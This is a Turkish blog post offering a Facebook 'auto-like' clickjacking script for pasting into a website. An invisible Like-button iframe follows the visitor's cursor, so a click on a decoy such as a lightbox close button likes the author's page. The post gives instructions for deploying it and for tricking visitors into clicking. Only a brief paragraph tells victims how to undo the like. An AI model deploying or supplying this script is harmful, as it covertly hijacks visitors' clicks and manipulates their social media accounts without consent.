Facebook için sorunsuz çalışan adam gibi Oto-Like kodu



En çok aranan sorgulardan biride buydu bende hemen olaya el atayım dedim ve adam gibi sapasağlam bir kod buldum. Her otolike kodunda olduğu gibi bu da siteye giren kişinin bir yere tıklamasıyla aktif oluyor. Bunun için site açılışında açılan güzel bir lightbox yaparsanız ziyaretçi bunu kapatmak için çarpıya veya kapat'a basar. Böylece aynı zamanda sayfanızı beğenmiş olur.



Oto-Like mağduru olmayın



Eğer buradaki kodu alan bir kişinin sitesine girdiyseniz, yani anladıysanız oto-like olduğunu hemen ardından facebook profilinize girin size yabancı bir sayfa varsa beğenmekten vazgeçin olsun bitsin :)



Facebook Oto Like kodu



<script type="text/javascript"> 

/*
This code demonstrate a clickjack attack on websites. Similar to that of twitter & on facebook

*/

(function(){
var tempX = 0,
tempY = 0,

IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);

var like = document.createElement('iframe');
like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'FACEBOOK SAYFA URL ADRESINIZ') + '&amp;layout=standard&amp;show_faces=true&amp;widt h=53&amp;action=like&amp;colorscheme=light&amp;hei ght=80';
like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://j.mp/n1m7TB') + '&amp;layout=standard&amp;show_faces=true&amp;widt h=53&amp;action=like&amp;colorscheme=light&amp;hei ght=80';
like.scrolling = 'no';
like.frameBorder = 0;
like.allowTransparency = 'true';
like.style.border = 0;
like.style.overflow = 'hidden';
like.style.cursor = 'pointer';
like.style.width = '53px';
like.style.height = '23px';
like.style.position = 'absolute';
like.style.opacity = 0; //Would be 0 if really used
document.getElementsByTagName('body')[0].appendChild(like);

window.addEventListener('mousemove', mouseMove, false);

setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(like);
window.removeEventListener('mousemove', mouseMove, false);
}, 10000);

function mouseMove(e) {
if (IE) {
tempX = event.clientX + document.body.scrollLeft;
tempY = event.clientY + document.body.scrollTop;
} else {
tempX = e.pageX;
tempY = e.pageY;
}

if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0;

like.style.top = (tempY - 8) + 'px';
like.style.left = (tempX - 25) + 'px';

return true
}
})();
</script>


Kodu sitenizde herhangi bir yere eklemeniz yeterlidir ve son olarak kırmızı yazıyla yazdığım kısmı kendi facebook url'niz ile değiştiriniz.



Örn:

  • https://www.facebook.com/pages/Can%C4%B1n-Cehenneme-Chelios/18960393444184

  • https://www.facebook.com/FurkanOzdenTR

gibi. Hadi kolay gelsin :)

0 yorum:

Post a Comment